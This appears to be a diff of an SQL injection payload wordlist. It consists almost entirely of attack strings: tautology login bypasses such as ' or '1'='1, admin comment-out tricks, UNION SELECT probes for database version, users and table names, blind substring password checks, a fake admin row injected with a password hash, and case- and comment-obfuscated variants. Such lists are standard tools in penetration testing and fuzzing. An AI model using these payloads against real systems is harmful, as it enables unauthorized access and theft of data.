||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
